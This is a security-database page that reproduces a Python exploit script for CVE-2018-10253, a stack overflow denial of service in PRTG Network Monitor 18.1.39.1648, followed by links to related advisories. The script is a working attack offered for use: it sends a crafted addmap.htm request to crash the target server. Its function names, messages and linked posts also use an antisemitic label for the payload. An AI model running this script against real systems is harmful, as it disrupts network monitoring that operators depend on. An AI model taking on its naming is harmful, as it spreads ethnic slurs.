Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLucas CarmoPACKETSTORM:147302
HistoryApr 23, 2018 - 12:00 a.m.

PRTG 18.1.39.1648 Stack Overflow

2018-04-2300:00:00
Lucas Carmo
packetstormsecurity.com
39

0.006 Low

EPSS

Percentile

79.4%

JSON
`# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow  
# Date: 2018-04-21  
# Exploit Author: Lucas "luriel" Carmo  
# Vendor Homepage: https://www.paessler.com/prtg  
# Software Link: https://www.paessler.com/download/prtg-download  
# Version: 18.1.39.1648  
# CVE : CVE-2018-10253  
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5  
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/  
  
#!/usr/bin/python  
  
import requests  
import sys  
import os  
import re  
import socket  
  
green = "\033[1;32m"  
yellow = '\033[1;33m'  
normal = '\033[0;0m'  
banner = """  
aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaa aaaa aaa aaaaaa aaaaaaa aaaaaa aaa aaaa aaaa  
aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa aaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaa  
aaaaaaaaa aaa aa aaaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa  
aa aaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaa  
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa aaa aaaaaaaaa aaaaaa aaa aaaaaaaaaaaaaa aaa aaa  
aaaaaa aaaaaaaa aaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaaaa aaaaaa aaa aaaaaaaaaaaaaa aaa  
"""  
  
  
banner2 = """  
Author: @Lucas "luriel" Carmo  
"""  
  
os.system('clear')  
  
print(green+banner)  
print(yellow+banner2)  
print(normal)  
  
def check_http(url):  
pattern = re.compile("http://")  
return re.search(pattern, url)  
  
def sanitize_url(url):  
if(not check_http(url)):  
return "http://" + url  
return url  
  
def check_server(url):  
r = requests.get(url, timeout=4)  
code = r.status_code  
  
def send_jewish_payload(url):  
payload = {'file':'addmap.htm'}  
r = requests.post(url, params=payload)  
  
def main():  
try:  
if len(sys.argv) <= 3 and len (sys.argv) >= 2:  
try:  
url = sanitize_url(sys.argv[1])  
print(' [#] LOADING!')  
if (check_server(url) != 404):  
send_jewish_payload(url)  
else:  
print(' [!] Server shutdown or not found')  
except requests.exceptions.ConnectionError:  
print(' [~] BOOOOOM! PRTG Server has been exploded!')  
except requests.exceptions.InvalidURL:  
print(' [!] Invalid URL')  
except requests.exceptions.Timeout:  
print(' [!] Connection Timeout\n')  
else:  
print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')  
except KeyboardInterrupt:  
print(' [!] Jewish Napalm Canceled;.....[./]')  
if __name__ == '__main__':  
main()  
  
  
`

Related

cve 1
prion 1
exploitpack 1
openvas 1
cvelist 1
zdt 1
nvd 1
exploitdb 1
cve
cve
CVE-2018-10253
2018-04-21 02:29:00
prion
prion
Code injection
2018-04-21 02:29:00
exploitpack
exploitpack
PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)
2018-04-23 00:00:00
openvas
openvas
PRTG Network Monitor < 18.1.39.1648 Stack Overflow Vulnerability
2018-04-24 00:00:00
cvelist
cvelist
CVE-2018-10253
2018-04-21 02:00:00
zdt
zdt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit
2018-04-23 00:00:00
nvd
nvd
CVE-2018-10253
2018-04-21 02:29:00
exploitdb
exploitdb
PRTG Network Monitor &lt; 18.1.39.1648 - Stack Overflow (Denial of Service)
2018-04-23 00:00:00

0.006 Low

EPSS

Percentile

79.4%

JSON
Related for PACKETSTORM:147302
cve1prion1exploitpack1openvas1cvelist1zdt1nvd1exploitdb1